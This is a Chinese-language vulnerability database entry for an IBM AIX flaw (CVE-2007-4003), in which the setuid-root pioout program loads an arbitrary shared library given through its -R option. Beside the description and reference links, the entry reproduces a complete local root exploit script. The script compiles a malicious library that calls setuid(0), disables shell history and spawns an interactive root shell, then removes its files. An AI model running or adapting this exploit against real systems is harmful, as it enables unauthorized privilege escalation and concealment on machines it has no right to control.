IBM AIX Pioout任意库加载命令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113384 漏洞类型 设计错误
发布时间 2007-07-27 更新时间 2007-07-27
CVE编号 CVE-2007-4003 CNNVD-ID CNNVD-200707-486
漏洞平台 AIX CVSS评分 6.9
|漏洞来源
https://www.exploit-db.com/exploits/4232
https://www.securityfocus.com/bid/25084
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-486
|漏洞详情
IBMAIX是一款商业性质的UNIX操作系统。AIX操作系统所随捆绑的pioout程序处理命令行参数时存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。pioout程序没有丢弃权限便加载了攻击者所提供的任意共享库,如果使用了-R命令行参数攻击者就可以指定用于解析打印机数据的共享库。pioout程序拥有rootsetuid,任何本地用户都可以执行,因此本地攻击者可以通过创建一个执行shell的共享库导致以root用户权限执行任意命令。
|漏洞EXP
#!/bin/sh
#
# 07/2007: public release
# IBM AIX <= 5.3 sp6
#
echo "-------------------------------"
echo " AIX pioout Local Root Exploit "
echo " By qaaz"
echo "-------------------------------"
cat >piolib.c <<_EOF_
#include <stdlib.h>
#include <unistd.h>
void init() __attribute__ ((constructor));
void init()
{
	seteuid(0);
	setuid(0);
	putenv("HISTFILE=/dev/null");
	execl("/bin/bash", "bash", "-i", (void *) 0);
	execl("/bin/sh", "sh", "-i", (void *) 0);
	perror("execl");
	exit(1);
}
_EOF_
gcc piolib.c -o piolib -shared -fPIC
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
rm -f piolib.c piolib

# milw0rm.com [2007-07-27]
|受影响的产品
IBM AIX 5.3 IBM AIX 5.2
|参考资料

来源:IDEFENSE
名称:20070726IBMAIXpiooutArbitraryLibraryLoadingVulnerability
链接:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=569
来源:XF
名称:aix-pioout-r-bo(35628)
链接:http://xforce.iss.net/xforce/xfdb/35628
来源:SECTRACK
名称:1018466
链接:http://www.securitytracker.com/id?1018466
来源:BID
名称:25084
链接:http://www.securityfocus.com/bid/25084
来源:VUPEN
名称:ADV-2007-2677
链接:http://www.frsirt.com/english/advisories/2007/2677
来源:AIXAPAR
名称:IZ01122
链接:http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01122
来源:AIXAPAR
名称:IZ01121
链接:http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01121
来源:SECUNIA
名称:26219
链接:http://secunia.com/advisories/26219
来源:aix.software.ibm.com
链接:ftp://aix.software.ibm.com/aix/efixes/security/README